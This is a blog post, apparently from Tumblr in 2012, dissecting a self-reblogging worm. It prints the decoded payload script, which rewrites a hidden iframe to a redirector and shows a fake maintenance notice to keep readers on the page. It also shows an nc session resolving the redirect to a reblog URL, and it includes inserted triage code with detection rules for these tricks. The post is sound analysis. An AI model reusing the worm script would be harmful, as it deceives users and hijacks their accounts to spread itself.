Glad to see the GNAA is still just as irrelevant as ever.

Okay, let’s look into this virus because we all know I love nothing more than picking these things apart.

The payload is really just a base64-encoded script embedded into a video post. I’m not sure how exactly this works and I’m not about to open it in a reblog window to find out for obvious reasons, but it wouldn’t surprise me if Tumblr just didn’t even bother to check the validity of a video <embed> code.

Here’s the script, decoded from base64:

var framekiller = true;
window.onload = function(){
  // Point the empty iframe under the video at the redirector host; the
  // redirect lands on a tumblr.com/reblog/... URL (see the nc session below).
  document.getElementById('lapper').src = "http://i.hope.you.get.strangled.net";

}
window.onbeforeunload = function() {
  if(framekiller) {
    // Fake "maintenance notice" returned to the leave-page prompt, nudging the
    // reader to pick "Stay on this page" so the iframe has time to finish loading.
    return "Notice: Tumblr will be undergoing maintenance on December 4th 2012 at 01:00 AM for several hours.\n\n We cannot forecast for exactly how long, unfortunately.\n We apologize for the inconvenience.\n\nYou may now dismiss this message via 'Cancel/Stay on this page'. Thank you.";  // any message that helps user to make decision
  }
};

#lapper is just an empty iframe that appears underneath the video. So what’s this “i.hope.you.get.strangled” site?
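Here is an added example (my own triage helper, not code from the original post or from the worm) that does the decoding step above mechanically and flags what makes the decoded script suspicious: the onload iframe rewrite and the onbeforeunload hijack. The post does not say exactly how the base64 blob was smuggled into the video post, so the embed snippet below is constructed on the assumption that it sat in a base64 data: URL; the decoded script is the one quoted above. Note that the beforeunload trick relied on 2012 browsers showing the returned string verbatim; modern browsers ignore custom text and show a generic prompt.

```javascript
// Added example, not code from the original post or the worm. Triage helper
// for a post that smuggles a base64-encoded script, as the post describes.
// ASSUMPTION: the blob sits in a src="data:...;base64,..." attribute; the
// post's author did not confirm how Tumblr accepted it, so SAMPLE_EMBED is
// constructed for illustration. PAYLOAD_SCRIPT is the script quoted in the
// post (maintenance message shortened).

const PAYLOAD_SCRIPT = [
  'var framekiller = true;',
  'window.onload = function(){',
  '  document.getElementById(\'lapper\').src = "http://i.hope.you.get.strangled.net";',
  '}',
  'window.onbeforeunload = function() {',
  '  if(framekiller) {',
  '    return "Notice: Tumblr will be undergoing maintenance on December 4th 2012 at 01:00 AM for several hours.";',
  '  }',
  '};',
].join('\n');

// Constructed embed snippet carrying the script as a base64 data: URL,
// next to the empty iframe the script targets.
const SAMPLE_EMBED =
  '<iframe id="lapper"></iframe>' +
  '<embed src="data:text/html;base64,' +
  Buffer.from(PAYLOAD_SCRIPT, 'utf8').toString('base64') +
  '" width="500" height="300">';

// Pull every base64-looking run of reasonable length out of the markup and
// keep the ones that decode to printable ASCII (binary media is dropped).
function extractBase64Blobs(html) {
  const candidates = html.match(/[A-Za-z0-9+/]{40,}={0,2}/g) || [];
  const blobs = [];
  for (const c of candidates) {
    const text = Buffer.from(c, 'base64').toString('utf8');
    if (/^[\t\n\r\x20-\x7e]+$/.test(text)) blobs.push(text);
  }
  return blobs;
}

// Indicators that matter for this worm, in the order they occur in the script.
const RULES = [
  { name: 'onload-trigger',      re: /window\.onload\s*=/ },
  { name: 'iframe-src-rewrite',  re: /getElementById\([^)]*\)\.src\s*=/ },
  { name: 'beforeunload-hijack', re: /onbeforeunload|addEventListener\(\s*['"]beforeunload/ },
];

function scanScript(script) {
  return RULES.filter((r) => r.re.test(script)).map((r) => r.name);
}

// Defang URLs the way the post does (hXXp), plus bracketed dots, so the
// triage report can be pasted anywhere without becoming clickable.
function defang(url) {
  return url.replace(/^http/i, 'hXXp').replace(/\./g, '[.]');
}

// Decode every blob, scan it, and collect indicators plus defanged URLs.
function triageEmbed(html) {
  const blobs = extractBase64Blobs(html);
  const indicators = new Set();
  const urls = new Set();
  for (const script of blobs) {
    scanScript(script).forEach((i) => indicators.add(i));
    (script.match(/https?:\/\/[^\s"'<>]+/g) || []).forEach((u) => urls.add(defang(u)));
  }
  return { blobs, indicators: [...indicators], urls: [...urls] };
}

console.log(JSON.stringify(triageEmbed(SAMPLE_EMBED), null, 2));
```

Run it with node; the report for the constructed embed lists one decoded blob, all three indicators, and the defanged redirector host, which is what you would then resolve by hand (as the nc session below does) rather than in a logged-in browser.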

$ nc i.hope.you.get.strangled.net 80
GET / HTTP/1.1
Host: i.hope.you.get.strangled.net

HTTP/1.1 301 Moved Permanently
Date: Mon, 03 Dec 2012 16:50:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.8 with Suhosin-Patch
X-Powered-By: PHP/5.3.8
Cache-Control: public, max-age=15
X-Abuse: URL redirection provided by freedns.afraid.org - please report any misuse of this service
Location: hXXp://www.tumblr.com/reblog/37107421802/uJHrEsZm
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
0

(Note that I’ve altered the link above so no one accidentally clicks on it.)
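As an added example (my own code, not the post's), here is the same check done as a parser over the raw response instead of by eyeballing it: it reads the status line and headers, decodes the chunked body, and pulls out the Location without ever following it, since following that redirect from a browser logged in to Tumblr is exactly what the worm relies on. RAW_RESPONSE is reconstructed from the transcript above with CRLF line ends restored and the Location kept in the post's hXXp-defanged form (the classifier accepts both spellings so the sample runs); CHUNKED_200 is a constructed response with a non-empty body to exercise the chunk decoder.

```javascript
// Added example, not from the original post: parse the raw HTTP/1.1 response
// captured with nc and extract the redirect target WITHOUT following it.
// RAW_RESPONSE is reconstructed from the post's transcript (CRLF restored;
// Location keeps the post's hXXp defanging). CHUNKED_200 is constructed.

const RAW_RESPONSE = [
  'HTTP/1.1 301 Moved Permanently',
  'Date: Mon, 03 Dec 2012 16:50:09 GMT',
  'Server: Apache/1.3.42 (Unix) PHP/5.3.8 with Suhosin-Patch',
  'X-Powered-By: PHP/5.3.8',
  'Cache-Control: public, max-age=15',
  'X-Abuse: URL redirection provided by freedns.afraid.org - please report any misuse of this service',
  'Location: hXXp://www.tumblr.com/reblog/37107421802/uJHrEsZm',
  'Connection: close',
  'Transfer-Encoding: chunked',
  'Content-Type: text/html',
  '',
  '0',
  '',
  '',
].join('\r\n');

const CHUNKED_200 =
  'HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n';

// Decode a chunked body: "<hex size>[;ext]\r\n<data>\r\n" repeated until a
// zero-size chunk. Works on ASCII bodies (sizes are counted in characters
// here; use a Buffer for binary content). Trailers are ignored.
function decodeChunked(body) {
  let out = '';
  let pos = 0;
  for (;;) {
    const eol = body.indexOf('\r\n', pos);
    if (eol < 0) throw new Error('truncated chunk-size line');
    const size = parseInt(body.slice(pos, eol).split(';')[0].trim(), 16);
    if (Number.isNaN(size)) throw new Error('bad chunk size');
    pos = eol + 2;
    if (size === 0) return out;
    out += body.slice(pos, pos + size);
    pos += size + 2;
  }
}

// Split status line, headers (lower-cased, duplicates joined) and body.
function parseResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  if (sep < 0) throw new Error('no end of headers');
  const headLines = raw.slice(0, sep).split('\r\n');
  const m = /^HTTP\/(\d\.\d) (\d{3})(?: (.*))?$/.exec(headLines[0]);
  if (!m) throw new Error('bad status line: ' + headLines[0]);
  const headers = {};
  for (const line of headLines.slice(1)) {
    const i = line.indexOf(':');
    if (i < 0) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    headers[name] = name in headers ? headers[name] + ', ' + value : value;
  }
  let body = raw.slice(sep + 4);
  if ((headers['transfer-encoding'] || '').toLowerCase() === 'chunked') body = decodeChunked(body);
  return { version: m[1], status: Number(m[2]), reason: m[3] || '', headers, body };
}

function defang(url) {
  return url.replace(/^http/i, 'hXXp').replace(/\./g, '[.]');
}

// Classify the redirect: where it goes, whether it came through freedns,
// and whether the target is a tumblr.com/reblog/<post>/<key> endpoint.
function classifyRedirect(resp) {
  const loc = resp.headers['location'] || null;
  const isRedirect = resp.status >= 300 && resp.status < 400 && loc !== null;
  const m = loc ? /^h(?:tt|xx)ps?:\/\/([^/?#]+)([^?#]*)/i.exec(loc) : null;
  const host = m ? m[1].toLowerCase() : null;
  const path = m ? m[2] : null;
  return {
    isRedirect,
    location: loc ? defang(loc) : null,
    host,
    path,
    viaFreedns: /freedns\.afraid\.org/i.test(resp.headers['x-abuse'] || ''),
    isTumblrReblog: !!host && /(^|\.)tumblr\.com$/.test(host) && /^\/reblog\/\d+\/[A-Za-z0-9]+$/.test(path),
  };
}

console.log(classifyRedirect(parseResponse(RAW_RESPONSE)));
```

The point of stopping at the Location header is that the redirector is harmless on its own; the harm is in what a logged-in browser does once it lands on the reblog URL, so resolve the chain with nc or this parser, never by clicking.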

In short, it’s a redirect to a reblog link. Note that this isn’t the same exploit as the trolling-maximum exploit from a couple months ago where fast_reblog pages didn’t do a CSRF check. So why does the reblog go through? Shouldn’t it wait for user input on the reblog page before being posted?

Unsurprisingly, Tumblr seems to have disabled reblogging for the moment while they fix the problem, so I can’t look any further into it than that for now. My guess is that the preview frame on the reblog page loads a different script that simulates a press of the “Create post” button, perhaps by checking the referring URL for “/reblog/”. But that’s just speculation.

So what have we learned today? Not much, really, considering we already knew that Tumblr and security are water and oil. We also already knew not to click on suspicious-looking posts… oh wait.

  1. drugtripglasses reblogged this from fraxtil and added:
    well that was a riveting read. a script that simulates a click on the reblog post button sounds likely, or at least easy...
  2. radruler reblogged this from fraxtil and added:
    Always love to see deconstruction work like this, would look into it myself too if I weren’t headed to class heh :x
  3. barrymanilowswinternightmare said: Fraxtil “SnarkDaddy” Gayfur B)
  4. fraxtil posted this